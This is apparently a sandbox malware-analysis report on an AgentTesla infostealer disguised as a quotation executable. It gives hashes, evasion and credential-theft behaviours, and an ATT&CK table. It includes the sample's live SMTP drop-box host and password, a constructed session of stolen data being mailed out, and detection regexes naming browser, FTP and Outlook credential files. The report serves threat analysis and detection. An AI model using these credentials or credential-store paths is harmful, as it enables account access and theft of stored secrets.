General

  • Target

    5a3652c9d19862d41a9aa461544ca78f2a3ea9c3ea00f9dd4ad92da4d2d42f14

  • Size

    398KB

  • Sample

    220521-dfq2rsafgr

  • MD5

    07d5e20e3187510923a41dae53cbd993

  • SHA1

    3ad58425ee0b1744117b3c6422be13bc70a2a0dc

  • SHA256

    5a3652c9d19862d41a9aa461544ca78f2a3ea9c3ea00f9dd4ad92da4d2d42f14

  • SHA512

    4e68ed1f7a655e0518b3cee7445f0a09e6fbc5a975bf4872f7165a3979597ad6fc3437fee6a644ec21b07d85804265730299ef40e5c47652fc8dcc6977b59e76

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:
    smtp
  • Host:
    mail.novadelmar.com
  • Port:
    587
  • Username:
    [email protected]
  • Password:
    comprasnova2020

Extracted

Credentials

  • Protocol:
    smtp
  • Host:
    mail.novadelmar.com
  • Port:
    587
  • Username:
    [email protected]
  • Password:
    comprasnova2020
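The extracted config says how this sample exfiltrates: it authenticates to an SMTP submission port with a hard-coded mailbox password and mails the stolen data to itself. The following is an added example, not sandbox tooling or code from the sample, that pulls those indicators out of a captured SMTP session. The transcript is constructed to mirror the extracted config (host mail.novadelmar.com, port 587, password comprasnova2020); the username is redacted in the report, so `compras@example.invalid` is an assumed stand-in, and the Subject line is invented. AUTH LOGIN is assumed as the authentication mechanism.

```python
"""Pull exfiltration indicators out of a captured SMTP session of the kind an
AgentTesla sample produces when it mails stolen data. Added example for this
report, not sandbox tooling. The transcript is constructed: it mirrors the
extracted config (mail.novadelmar.com:587, password comprasnova2020) and uses
'compras@example.invalid' as an assumed stand-in for the redacted username."""
import base64
import re

def _b64(s: str) -> str:
    return base64.b64encode(s.encode()).decode()

USERNAME = "compras@example.invalid"   # assumed stand-in for the redacted value
PASSWORD = "comprasnova2020"

# Constructed transcript. 'S:' is the server, 'C:' the infected host. A real
# capture is encrypted after STARTTLS; this is what a TLS-intercepting sandbox
# proxy would log. The Subject format is invented for the example.
SAMPLE_SESSION = f"""\
S: 220 mail.novadelmar.com ESMTP ready
C: EHLO DESKTOP-1234
S: 250-mail.novadelmar.com
S: 250-STARTTLS
S: 250 AUTH LOGIN PLAIN
C: STARTTLS
S: 220 2.0.0 Ready to start TLS
C: EHLO DESKTOP-1234
S: 250-mail.novadelmar.com
S: 250 AUTH LOGIN PLAIN
C: AUTH LOGIN
S: 334 {_b64("Username:")}
C: {_b64(USERNAME)}
S: 334 {_b64("Password:")}
C: {_b64(PASSWORD)}
S: 235 2.7.0 Authentication successful
C: MAIL FROM:<{USERNAME}>
S: 250 2.1.0 Ok
C: RCPT TO:<{USERNAME}>
S: 250 2.1.5 Ok
C: DATA
S: 354 End data with <CR><LF>.<CR><LF>
C: Subject: Passwords / DESKTOP-1234
C: .
S: 250 2.0.0 Ok: queued
C: QUIT
"""

def parse_smtp_session(transcript: str) -> dict:
    """Walk the transcript and return the server name, the victim hostname
    (EHLO), whether STARTTLS was negotiated, the AUTH LOGIN credentials, the
    envelope addresses and the Subject line."""
    info = {"server": None, "ehlo": None, "starttls": False, "auth": None,
            "username": None, "password": None, "mail_from": None,
            "rcpt_to": [], "subject": None}
    auth_stage = None   # None | "user" | "pass": which AUTH LOGIN field is next
    for raw in transcript.splitlines():
        side, _, line = raw.partition(": ")
        if side == "S":
            if line.startswith("220 ") and info["server"] is None:
                info["server"] = line.split()[1]
            elif line.startswith("334 "):
                # AUTH LOGIN prompt; decoding it is more robust than relying on order
                prompt = base64.b64decode(line[4:]).decode(errors="replace")
                auth_stage = "user" if prompt.startswith("Username") else "pass"
            continue
        if auth_stage:   # client answer to the last 334 prompt, base64-encoded
            value = base64.b64decode(line).decode(errors="replace")
            info["username" if auth_stage == "user" else "password"] = value
            auth_stage = None
            continue
        up = line.upper()
        if up.startswith("EHLO ") or up.startswith("HELO "):
            info["ehlo"] = line.split(None, 1)[1]
        elif up == "STARTTLS":
            info["starttls"] = True
        elif up.startswith("AUTH "):
            info["auth"] = line.split()[1].upper()
        elif up.startswith("MAIL FROM:"):
            info["mail_from"] = re.search(r"<([^>]*)>", line).group(1)
        elif up.startswith("RCPT TO:"):
            info["rcpt_to"].append(re.search(r"<([^>]*)>", line).group(1))
        elif up.startswith("SUBJECT:"):
            info["subject"] = line.split(":", 1)[1].strip()
    return info

def matches_extracted_config(info: dict, host: str, password: str) -> bool:
    """True when the session authenticates to the host/password from the
    extracted config, i.e. the config is live and the account is the drop box."""
    return info["server"] == host and info["password"] == password

if __name__ == "__main__":
    print(parse_smtp_session(SAMPLE_SESSION))
```

Because the client requests STARTTLS before AUTH, an ordinary network capture only shows the destination host, port 587 and the EHLO; the credentials are only visible with TLS interception or from the extracted config, which is why the host/port pair is the indicator to block and the password is the indicator to hand to the mail provider.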

Targets

    • Target

      Quotation_AxFlow_0943565624453003.exe

    • Size

      431KB

    • MD5

      6bdc3dc75ab89568188371c346b93c71

    • SHA1

      6274da4083637f214ecab18cc02716647f07112f

    • SHA256

      bc3401d05a180606f7593e377e8bb1070c06c90cde1e268954f43e44d8b571a6

    • SHA512

      7deb8de750e66ac796ffc84c545a8140448e100564b715abe8256e84501a1bb204f77e320948a6fc5e8afab123719b82f41c0ed5e6a6ad8a42d0c0c7e56550ab

    • AgentTesla

      Agent Tesla is a remote access tool (RAT) and information stealer written in Visual Basic .NET; the credentials it harvests are exfiltrated over channels such as SMTP, as in the extracted config above.

    • AgentTesla Payload

    • Looks for VirtualBox Guest Additions in registry

    • Looks for VMWare Tools registry key

    • Checks BIOS information in registry

      BIOS information is often read in order to detect sandboxing environments.

    • Checks computer location settings

      Looks up the country code configured in the registry, likely used for geofencing.

    • Reads data files stored by FTP clients

      Tries to access configuration files (saved servers and credentials) associated with FTP clients such as FileZilla.

    • Reads user/profile data of local email clients

      Email clients store user data, including account credentials, on disk, and infostealers often target it.

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials, cookies and autofill data.

    • Accesses Microsoft Outlook profiles

    • Maps connected drives based on registry

      Disk information is often read in order to detect sandboxing environments.

    • Suspicious use of SetThreadContext

      SetThreadContext is commonly used to redirect a suspended thread into injected code (for example in process hollowing), so the unpacked payload may run in a different process from the dropper.
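The signatures above are each a registry key or file path the sample touched. The following is an added example, not tooling from the sandbox, that maps a list of registry/file access events onto those behaviours and the ATT&CK v6 technique IDs the report uses. The key and path patterns are the author's assumptions about what each signature looks for, drawn from well-known artefacts (the VirtualBox Guest Additions and VMware Tools keys, the BIOS description key, Geo\Nation, the Disk\Enum key, FileZilla and Outlook profile locations, Chromium `Login Data`); the sample events are constructed, not real sandbox output.

```python
"""Map sandbox registry/file access events onto the behaviours flagged in this
report. Added example, not sandbox tooling. SIGNATURES holds the author's
assumed patterns for each signature; SAMPLE_EVENTS is constructed."""
import re
from collections import defaultdict

# (signature name as in the report, ATT&CK v6 technique ID, regex over the path)
SIGNATURES = [
    ("Looks for VirtualBox Guest Additions in registry", "T1497",
     r"^HKLM\\SOFTWARE\\Oracle\\VirtualBox Guest Additions"),
    ("Looks for VMWare Tools registry key", "T1497",
     r"^HKLM\\SOFTWARE\\VMware, Inc\.\\VMware Tools"),
    ("Checks BIOS information in registry", "T1082",
     r"^HKLM\\HARDWARE\\DESCRIPTION\\System\\BIOS"),
    ("Checks computer location settings", "T1082",
     r"^HKCU\\Control Panel\\International\\Geo\\Nation"),
    ("Maps connected drives based on registry", "T1120",
     r"^HKLM\\SYSTEM\\CurrentControlSet\\Services\\Disk\\Enum"),
    ("Reads data files stored by FTP clients", "T1081",
     r"\\AppData\\Roaming\\FileZilla\\(recentservers|sitemanager)\.xml$"),
    ("Accesses Microsoft Outlook profiles", "T1114",
     r"^HKCU\\Software\\Microsoft\\Office\\\d+\.0\\Outlook\\Profiles"),
    ("Reads user/profile data of web browsers", "T1081",
     r"\\User Data\\[^\\]+\\Login Data$"),
]

# Constructed events in the shape (pid, operation, path); not real sandbox output.
SAMPLE_EVENTS = [
    (4120, "RegOpenKey", r"HKLM\SOFTWARE\Oracle\VirtualBox Guest Additions"),
    (4120, "RegOpenKey", r"HKLM\SOFTWARE\VMware, Inc.\VMware Tools"),
    (4120, "RegQueryValue", r"HKLM\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer"),
    (4120, "RegQueryValue", r"HKCU\Control Panel\International\Geo\Nation"),
    (4120, "RegEnumValue", r"HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum"),
    (4120, "CreateFile", r"C:\Users\victim\AppData\Roaming\FileZilla\recentservers.xml"),
    (4120, "RegOpenKey", r"HKCU\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook"),
    (4120, "CreateFile", r"C:\Users\victim\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    (4120, "CreateFile", r"C:\Users\victim\Documents\notes.txt"),            # benign noise
    (9001, "RegOpenKey", r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"),  # another process
]

def normalise(path: str) -> str:
    """Collapse long hive names so one pattern covers both spellings."""
    return (path.replace("HKEY_LOCAL_MACHINE", "HKLM")
                .replace("HKEY_CURRENT_USER", "HKCU"))

def match_events(events):
    """Return {pid: [(signature, technique_id, path), ...]} for every event
    that hits a signature; an event hits at most one signature (first wins)."""
    hits = defaultdict(list)
    for pid, _op, path in events:
        p = normalise(path)
        for name, tid, pattern in SIGNATURES:
            if re.search(pattern, p, re.IGNORECASE):
                hits[pid].append((name, tid, path))
                break
    return dict(hits)

def summarise(hits):
    """Per pid: technique counts and a coarse verdict. The verdict rule is an
    assumption for illustration: a process that both probes for a VM (T1497)
    and reads credential stores (T1081/T1114) shows the infostealer pattern."""
    out = {}
    for pid, rows in hits.items():
        tids = defaultdict(int)
        for _name, tid, _path in rows:
            tids[tid] += 1
        evasion = tids["T1497"] > 0
        stealing = tids["T1081"] + tids["T1114"] > 0
        out[pid] = {"techniques": dict(tids),
                    "verdict": "infostealer-like" if evasion and stealing else "review"}
    return out

if __name__ == "__main__":
    for pid, s in summarise(match_events(SAMPLE_EVENTS)).items():
        print(pid, s)
```

The per-technique counts reproduce the kind of tally the ATT&CK matrix below shows (two sandbox-evasion hits, two credential-file hits, and so on), and a verdict that requires both the evasion probes and the credential-store reads keeps a lone BIOS or drive lookup from a legitimate installer from firing.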

MITRE ATT&CK Matrix (ATT&CK v6)

  Tactic                 Technique                        Signatures  ID
  Execution              Scheduled Task                   1           T1053
  Persistence            Scheduled Task                   1           T1053
  Privilege Escalation   Scheduled Task                   1           T1053
  Defense Evasion        Virtualization/Sandbox Evasion   2           T1497
  Credential Access      Credentials in Files             3           T1081
  Discovery              Query Registry                   5           T1012
  Discovery              Virtualization/Sandbox Evasion   2           T1497
  Discovery              System Information Discovery     4           T1082
  Discovery              Peripheral Device Discovery      1           T1120
  Collection             Data from Local System           3           T1005
  Collection             Email Collection                 1           T1114
